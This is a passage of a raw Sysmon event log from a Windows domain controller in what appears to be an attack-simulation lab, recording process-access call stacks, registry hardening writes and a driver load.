12:01:25.377{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000003267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.377{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000003252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:40.534C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 13241300x80000000000000003243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x80000000000000003242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x80000000000000003241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x80000000000000003240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x80000000000000003239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1101SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 10341000x80000000000000003238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.049{266CAFBE-646C-6064-1500-00000000AE01}13162180C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dl